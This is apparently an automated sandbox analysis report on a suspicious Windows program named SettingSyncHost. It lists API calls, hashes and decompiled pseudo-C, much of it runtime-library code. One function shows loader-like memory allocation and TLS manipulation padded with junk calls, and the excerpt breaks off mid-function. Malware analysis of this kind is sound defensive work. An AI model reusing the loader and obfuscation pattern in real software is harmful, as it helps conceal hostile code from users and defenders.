                                                                                                                                        • Part of subcall function 00399DC7: __amsg_exit.LIBCMT ref: 00399DE9
                                                                                                                                        • Part of subcall function 00399DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,003997EE,0000000D), ref: 00399DF1
                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 003997F6
                                                                                                                                      • __lock.LIBCMT ref: 0039980A
                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00399828
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                      • Opcode ID: cedfd00c99e2c923356924302a6c6a94fedfcce3e97d27ea88882f1b7286b60c
                                                                                                                                      • Instruction ID: 65d05c9c23fdb845898a7607fcc6c34cbfd2602489eac3a9913c09c2f4f16e9c
                                                                                                                                      • Opcode Fuzzy Hash: cedfd00c99e2c923356924302a6c6a94fedfcce3e97d27ea88882f1b7286b60c
                                                                                                                                      • Instruction Fuzzy Hash: 3F019275544B44DFDB22AF69D806B49FBF0AF40320F10890EE4D59B2A1CBB4AA44CF55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(?,003E0BCA,900C408B), ref: 003E7BFD
                                                                                                                                      • __fassign.LIBCMT ref: 003E7DE2
                                                                                                                                      • __fassign.LIBCMT ref: 003E7DFF
                                                                                                                                      • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003E7E47
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003E7E87
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 003E7F2F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1735259414-0
                                                                                                                                      • Opcode ID: 193e9d7d4047612391a89ac5d95227c94936e2ae33587c7b079ef41585f92453
                                                                                                                                      • Instruction ID: f1e59c6fa2b8fce35ffa5cc48fcf05db6bd8c0675e838cb5eec4c10f89deec08
                                                                                                                                      • Opcode Fuzzy Hash: 193e9d7d4047612391a89ac5d95227c94936e2ae33587c7b079ef41585f92453
                                                                                                                                      • Instruction Fuzzy Hash: 1FC19371D052989FCF16CFA9C9809EDBBB5EF48314F28426AE455BB381D731AD42CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D0079
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D009B
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D00BB
                                                                                                                                      • __Getctype.LIBCPMT ref: 003D0151
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D0170
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0188
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                      • Opcode ID: 3ed7ae4de608b44c798ab5ab97370aebae07a5355498f46855bbc4364f74bb76
                                                                                                                                      • Instruction ID: f76b67379f17e453ab25a6ba698e9b90fb2b00aae32f97615d7a6e6a84886579
                                                                                                                                      • Opcode Fuzzy Hash: 3ed7ae4de608b44c798ab5ab97370aebae07a5355498f46855bbc4364f74bb76
                                                                                                                                      • Instruction Fuzzy Hash: 3A41A172D00208DFCB26DF64E941BAEB7B4EB04B10F15816EE845AB391DB35AD45CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 003D6AF3
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B01
                                                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 003D6B1B
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B29
                                                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 003D6B4B
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3390117325-0
                                                                                                                                      • Opcode ID: e95c36ee78adec189bae9d55b262364bdd649e1d0eb0ec3d7778c4f99592bbaa
                                                                                                                                      • Instruction ID: 0ba99690cd8e21c7944d18f97c4acb88e8392338412902ab5b27e01935ae9896
                                                                                                                                      • Opcode Fuzzy Hash: e95c36ee78adec189bae9d55b262364bdd649e1d0eb0ec3d7778c4f99592bbaa
                                                                                                                                      • Instruction Fuzzy Hash: 0B11A571504B40AFDB21DF75D986B26B7E4BF40710F54851FE4968BA91C7B0F880CB55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,003DCD3A,003DB33A,003D9B0A), ref: 003DCD51
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003DCD5F
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003DCD78
                                                                                                                                      • SetLastError.KERNEL32(00000000,003DCD3A,003DB33A,003D9B0A), ref: 003DCDCA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: 7022f4d17eb37ddda9b71f1fb2af0fc0757a2cfa16b13150db63c9a1294b0197
                                                                                                                                      • Instruction ID: 4336e07b0c89aa843d339d2910f651a9b6bc8842dae3010f3d9a0fb6d912322c
                                                                                                                                      • Opcode Fuzzy Hash: 7022f4d17eb37ddda9b71f1fb2af0fc0757a2cfa16b13150db63c9a1294b0197
                                                                                                                                      • Instruction Fuzzy Hash: 10019EB322A6226EE6272B74BD854662E59EB05370721023BF110A83F0EF614C11D249
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                      			E0039A057(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				signed int _t15;
                                                                                                                                      				LONG* _t21;
                                                                                                                                      				void* _t31;
                                                                                                                                      				LONG* _t33;
                                                                                                                                      				void* _t34;
                                                                                                                                      				void* _t35;
                                                                                                                                      
                                                                                                                                      				_t35 = __eflags;
                                                                                                                                      				_t29 = __edx;
                                                                                                                                      				_t25 = __ebx;
                                                                                                                                      				_push(0xc);
                                                                                                                                      				_push(0x3c5ee8);
                                                                                                                                      				E0039A560(__ebx, __edi, __esi);
                                                                                                                                      				_t31 = E003998D1(__ebx, __edx, _t35);
                                                                                                                                      				_t15 =  *0x3c72f4; // 0xfffffffe
                                                                                                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                      					E00399DC7(_t25, _t31, 0xd);
                                                                                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                                                                                      					__eflags = _t33 -  *0x3c7a28; // 0x3c7600
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						__eflags = _t33;
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							__eflags = InterlockedDecrement(_t33);
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								__eflags = _t33 - 0x3c7600;
                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                      									E00399DFA(_t33);
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						_t21 =  *0x3c7a28; // 0x3c7600
                                                                                                                                      						 *(_t31 + 0x68) = _t21;
                                                                                                                                      						_t33 =  *0x3c7a28; // 0x3c7600
                                                                                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                                                                                      						InterlockedIncrement(_t33);
                                                                                                                                      					}
                                                                                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                      					E0039A0F2();
                                                                                                                                      				} else {
                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                      				}
                                                                                                                                      				_t38 = _t33;
                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                      					E003A235F(_t29, _t38, 0x20);
                                                                                                                                      				}
                                                                                                                                      				return E0039A5A5(_t33);
                                                                                                                                      			}










                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 0039A063
                                                                                                                                        • Part of subcall function 003998D1: __getptd_noexit.LIBCMT ref: 003998D4
                                                                                                                                        • Part of subcall function 003998D1: __amsg_exit.LIBCMT ref: 003998E1
                                                                                                                                      • __amsg_exit.LIBCMT ref: 0039A083
                                                                                                                                      • __lock.LIBCMT ref: 0039A093
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0039A0B0
                                                                                                                                      • _free.LIBCMT ref: 0039A0C3
                                                                                                                                      • InterlockedIncrement.KERNEL32(003C7600), ref: 0039A0DB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                      • Opcode ID: 7aeb5c5db5c8b62b9e52ccd1b596d12f49c3675f0d63588a610d395465c1bc60
                                                                                                                                      • Instruction ID: 88456f1a6724a6876c4df40d72434a037eec2808d307eee37f5b4e0e46ebbd28
                                                                                                                                      • Opcode Fuzzy Hash: 7aeb5c5db5c8b62b9e52ccd1b596d12f49c3675f0d63588a610d395465c1bc60
                                                                                                                                      • Instruction Fuzzy Hash: BA01D236A04E219BDF23AB298805B5D73A4BF05720F020209F804AB391C734BD91CFD6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E00393DD7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				intOrPtr* _t24;
                                                                                                                                      				void* _t35;
                                                                                                                                      				intOrPtr* _t37;
                                                                                                                                      				void* _t38;
                                                                                                                                      				void* _t39;
                                                                                                                                      
                                                                                                                                      				_t39 = __eflags;
                                                                                                                                      				_t33 = __edx;
                                                                                                                                      				_t27 = __ebx;
                                                                                                                                      				_push(0xc);
                                                                                                                                      				_push(0x3c5d58);
                                                                                                                                      				E0039A560(__ebx, __edi, __esi);
                                                                                                                                      				_t35 = E003998D1(__ebx, __edx, _t39);
                                                                                                                                      				_t37 = E0039A7FF(8, 1);
                                                                                                                                      				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                                                                                                                                      				_t40 = _t37;
                                                                                                                                      				if(_t37 != 0) {
                                                                                                                                      					E00399554(_t27, __edx, _t35, _t37, __eflags);
                                                                                                                                      					E0039A057(_t27, _t33, _t35, _t37, __eflags);
                                                                                                                                      					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                                                                                                                                      					 *(_t37 + 4) =  *(_t35 + 0x68);
                                                                                                                                      					E00399DC7(_t27, _t35, 0xc);
                                                                                                                                      					_t5 = _t38 - 4;
                                                                                                                                      					 *_t5 =  *(_t38 - 4) & 0x00000000;
                                                                                                                                      					__eflags =  *_t5;
                                                                                                                                      					E00399294( *_t37);
                                                                                                                                      					 *(_t38 - 4) = 0xfffffffe;
                                                                                                                                      					E00393E71();
                                                                                                                                      					E00399DC7(_t27, _t35, 0xd);
                                                                                                                                      					 *(_t38 - 4) = 1;
                                                                                                                                      					InterlockedIncrement( *(_t37 + 4));
                                                                                                                                      					 *(_t38 - 4) = 0xfffffffe;
                                                                                                                                      					E00393E7D();
                                                                                                                                      					_t24 = _t37;
                                                                                                                                      				} else {
                                                                                                                                      					 *((intOrPtr*)(E0039960F(_t40))) = 0xc;
                                                                                                                                      					_t24 = 0;
                                                                                                                                      				}
                                                                                                                                      				return E0039A5A5(_t24);
                                                                                                                                      			}









                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00393DE3
                                                                                                                                        • Part of subcall function 003998D1: __getptd_noexit.LIBCMT ref: 003998D4
                                                                                                                                        • Part of subcall function 003998D1: __amsg_exit.LIBCMT ref: 003998E1
                                                                                                                                      • __calloc_crt.LIBCMT ref: 00393DEE
                                                                                                                                        • Part of subcall function 0039A7FF: Sleep.KERNEL32(00000000), ref: 0039A827
                                                                                                                                      • __lock.LIBCMT ref: 00393E24
                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00393E30
                                                                                                                                      • __lock.LIBCMT ref: 00393E44
                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00393E54
                                                                                                                                        • Part of subcall function 0039960F: __getptd_noexit.LIBCMT ref: 0039960F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3803058747-0
                                                                                                                                      • Opcode ID: f1178753f7bb2a67e5d9023343f3a1cc3e5ed167561f9280c7ad51b21a21db11
                                                                                                                                      • Instruction ID: d62f4a13d4d9a71faaee65b6503eb5aed862908addb4934bf72f9d07b370bec8
                                                                                                                                      • Opcode Fuzzy Hash: f1178753f7bb2a67e5d9023343f3a1cc3e5ed167561f9280c7ad51b21a21db11
                                                                                                                                      • Instruction Fuzzy Hash: 210171B2900705AAEF12BFBC8846B5D77A0AF44720F21460DF4559E2D2DB7459409B52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • C:\Users\Public\SettingSyncHost, xrefs: 003EABEF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C:\Users\Public\SettingSyncHost
                                                                                                                                      • API String ID: 0-2131873982
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,003DDEA3,?,?,0040A300,00000000,?,003DDFCE,00000004,InitializeCriticalSectionEx,003FA8FC,003FA904,00000000), ref: 003DDE72
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,003E1091,?,?,003E1059,?,?,?), ref: 003E10B1
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003E10C4
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,003E1091,?,?,003E1059,?,?,?), ref: 003E10E7
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetCPInfo.KERNEL32(00D279A0,00D279A0,?,7FFFFFFF,?,?,003F5643,00D279A0,00D279A0,?,00D279A0,?,?,?,?,00D279A0), ref: 003F542A
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003F54E0
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 003F5576
                                                                                                                                      • __freea.LIBCMT ref: 003F55E1
                                                                                                                                      • __freea.LIBCMT ref: 003F55ED
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __alloca_probe_16__freea$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2330168043-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 29%
                                                                                                                                      			E00391BE0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                      				void* _v12;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				intOrPtr _v36;
                                                                                                                                      				intOrPtr _v48;
                                                                                                                                      				intOrPtr* _v60;
                                                                                                                                      				void _v260;
                                                                                                                                      				intOrPtr _t56;
                                                                                                                                      				void* _t57;
                                                                                                                                      				long _t75;
                                                                                                                                      				int _t77;
                                                                                                                                      				void* _t83;
                                                                                                                                      				intOrPtr _t93;
                                                                                                                                      				void* _t117;
                                                                                                                                      				void* _t133;
                                                                                                                                      				void* _t134;
                                                                                                                                      				long long* _t136;
                                                                                                                                      				void* _t137;
                                                                                                                                      				long long* _t138;
                                                                                                                                      				long long* _t140;
                                                                                                                                      				void* _t141;
                                                                                                                                      				long long* _t142;
                                                                                                                                      				void* _t143;
                                                                                                                                      				long long* _t144;
                                                                                                                                      				long long* _t147;
                                                                                                                                      				void* _t148;
                                                                                                                                      				long long* _t149;
                                                                                                                                      				void* _t150;
                                                                                                                                      				long long* _t151;
                                                                                                                                      				void* _t152;
                                                                                                                                      				long long* _t153;
                                                                                                                                      				long long* _t155;
                                                                                                                                      				void* _t156;
                                                                                                                                      				long long* _t157;
                                                                                                                                      				long long _t161;
                                                                                                                                      				long long _t162;
                                                                                                                                      				long long _t163;
                                                                                                                                      				long long _t164;
                                                                                                                                      				long long _t165;
                                                                                                                                      				long long _t166;
                                                                                                                                      				long long _t167;
                                                                                                                                      				long long _t168;
                                                                                                                                      				long long _t169;
                                                                                                                                      				long long _t170;
                                                                                                                                      				long long _t171;
                                                                                                                                      
                                                                                                                                      				_t117 = __edx;
                                                                                                                                      				memset( &_v260, 0xcccccccc, 0x40 << 2);
                                                                                                                                      				_v48 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                      				_v60 = _a4 +  *((intOrPtr*)(_v48 + 0xc0));
                                                                                                                                      				_t136 = _t134 + 0xc - 8;
                                                                                                                                      				_t161 =  *0x3bbc50;
                                                                                                                                      				 *_t136 = _t161;
                                                                                                                                      				E00393700(_t117);
                                                                                                                                      				 *_t136 = _t161;
                                                                                                                                      				E003935B0(_t117);
                                                                                                                                      				 *_t136 = _t161;
                                                                                                                                      				E00393460(_t117);
                                                                                                                                      				 *_t136 = _t161;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t161;
                                                                                                                                      				_t137 = _t136 + 8;
                                                                                                                                      				if(_v60 != _a4) {
                                                                                                                                      					_t138 = _t137 - 8;
                                                                                                                                      					_t162 =  *0x3bbc50;
                                                                                                                                      					 *_t138 = _t162;
                                                                                                                                      					E00393700(_t117);
                                                                                                                                      					 *_t138 = _t162;
                                                                                                                                      					E003935B0(_t117);
                                                                                                                                      					 *_t138 = _t162;
                                                                                                                                      					E00393460(_t117);
                                                                                                                                      					 *_t138 = _t162;
                                                                                                                                      					E00393340();
                                                                                                                                      					st0 = _t162;
                                                                                                                                      					_t140 = _t138 + 8 - 8;
                                                                                                                                      					_t163 =  *0x3bbc50;
                                                                                                                                      					 *_t140 = _t163;
                                                                                                                                      					E00393700(_t117);
                                                                                                                                      					 *_t140 = _t163;
                                                                                                                                      					E003935B0(_t117);
                                                                                                                                      					 *_t140 = _t163;
                                                                                                                                      					E00393460(_t117);
                                                                                                                                      					 *_t140 = _t163;
                                                                                                                                      					E00393340();
                                                                                                                                      					st0 = _t163;
                                                                                                                                      					_t141 = _t140 + 8;
                                                                                                                                      					_t56 = _v60;
                                                                                                                                      					_t119 =  *((intOrPtr*)(_t56 + 4)) -  *_v60;
                                                                                                                                      					_t57 = VirtualAlloc(0,  *((intOrPtr*)(_t56 + 4)) -  *_v60, 0x1000, 4);
                                                                                                                                      					__eflags = _t141 - _t141;
                                                                                                                                      					_v12 = E003931A1(_t57, _t141 - _t141);
                                                                                                                                      					_t142 = _t141 - 8;
                                                                                                                                      					_t164 =  *0x3bbc50;
                                                                                                                                      					 *_t142 = _t164;
                                                                                                                                      					E00393700( *((intOrPtr*)(_t56 + 4)) -  *_v60);
                                                                                                                                      					 *_t142 = _t164;
                                                                                                                                      					E003935B0( *((intOrPtr*)(_t56 + 4)) -  *_v60);
                                                                                                                                      					 *_t142 = _t164;
                                                                                                                                      					E00393460(_t119);
                                                                                                                                      					 *_t142 = _t164;
                                                                                                                                      					E00393340();
                                                                                                                                      					st0 = _t164;
                                                                                                                                      					_t143 = _t142 + 8;
                                                                                                                                      					__eflags = _v12;
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						_t144 = _t143 - 8;
                                                                                                                                      						_t165 =  *0x3bbc50;
                                                                                                                                      						 *_t144 = _t165;
                                                                                                                                      						E00393700(_t119);
                                                                                                                                      						 *_t144 = _t165;
                                                                                                                                      						E003935B0(_t119);
                                                                                                                                      						 *_t144 = _t165;
                                                                                                                                      						E00393460(_t119);
                                                                                                                                      						 *_t144 = _t165;
                                                                                                                                      						E00393340();
                                                                                                                                      						st0 = _t165;
                                                                                                                                      						_t122 = _v12;
                                                                                                                                      						E003938C0(_v12,  *_v60,  *((intOrPtr*)(_v60 + 4)) -  *_v60);
                                                                                                                                      						_t147 = _t144 + 0x14 - 8;
                                                                                                                                      						_t166 =  *0x3bbc50;
                                                                                                                                      						 *_t147 = _t166;
                                                                                                                                      						E00393700(_v12);
                                                                                                                                      						 *_t147 = _t166;
                                                                                                                                      						E003935B0(_v12);
                                                                                                                                      						 *_t147 = _t166;
                                                                                                                                      						E00393460(_t122);
                                                                                                                                      						 *_t147 = _t166;
                                                                                                                                      						E00393340();
                                                                                                                                      						st0 = _t166;
                                                                                                                                      						_t148 = _t147 + 8;
                                                                                                                                      						_t75 = TlsAlloc();
                                                                                                                                      						__eflags = _t148 - _t148;
                                                                                                                                      						_t77 = TlsSetValue(E003931A1(_t75, _t148 - _t148), _v12);
                                                                                                                                      						__eflags = _t148 - _t148;
                                                                                                                                      						E003931A1(_t77, _t148 - _t148);
                                                                                                                                      						_t149 = _t148 - 8;
                                                                                                                                      						_t167 =  *0x3bbc50;
                                                                                                                                      						 *_t149 = _t167;
                                                                                                                                      						E00393700(_t122);
                                                                                                                                      						 *_t149 = _t167;
                                                                                                                                      						E003935B0(_t122);
                                                                                                                                      						 *_t149 = _t167;
                                                                                                                                      						E00393460(_t122);
                                                                                                                                      						 *_t149 = _t167;
                                                                                                                                      						E00393340();
                                                                                                                                      						st0 = _t167;
                                                                                                                                      						_t150 = _t149 + 8;
                                                                                                                                      						_t83 = VirtualAlloc(0, 0x1100, 0x1000, 4);
                                                                                                                                      						__eflags = _t150 - _t150;
                                                                                                                                      						_v24 = E003931A1(_t83, _t150 - _t150);
                                                                                                                                      						_t151 = _t150 - 8;
                                                                                                                                      						_t168 =  *0x3bbc50;
                                                                                                                                      						 *_t151 = _t168;
                                                                                                                                      						E00393700(_t122);
                                                                                                                                      						 *_t151 = _t168;
                                                                                                                                      						E003935B0(_t122);
                                                                                                                                      						 *_t151 = _t168;
                                                                                                                                      						E00393460(_t122);
                                                                                                                                      						 *_t151 = _t168;
                                                                                                                                      						_t88 = E00393340();
                                                                                                                                      						st0 = _t168;
                                                                                                                                      						_t152 = _t151 + 8;
                                                                                                                                      						__eflags = _v24;
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							_t153 = _t152 - 8;
                                                                                                                                      							_t169 =  *0x3bbc50;
                                                                                                                                      							 *_t153 = _t169;
                                                                                                                                      							E00393700(_t122);
                                                                                                                                      							 *_t153 = _t169;
                                                                                                                                      							E003935B0(_t122);
                                                                                                                                      							 *_t153 = _t169;
                                                                                                                                      							E00393460(_t122);
                                                                                                                                      							 *_t153 = _t169;
                                                                                                                                      							E00393340();
                                                                                                                                      							st0 = _t169;
                                                                                                                                      							_t93 = _v60;
                                                                                                                                      							_t123 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8))));
                                                                                                                                      							_v36 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8))));
                                                                                                                                      							_t155 = _t153 + 8 - 8;
                                                                                                                                      							_t170 =  *0x3bbc50;
                                                                                                                                      							 *_t155 = _t170;
                                                                                                                                      							E00393700( *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)))));
                                                                                                                                      							 *_t155 = _t170;
                                                                                                                                      							E003935B0( *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)))));
                                                                                                                                      							 *_t155 = _t170;
                                                                                                                                      							E00393460(_t123);
                                                                                                                                      							 *_t155 = _t170;
                                                                                                                                      							E00393340();
                                                                                                                                      							st0 = _t170;
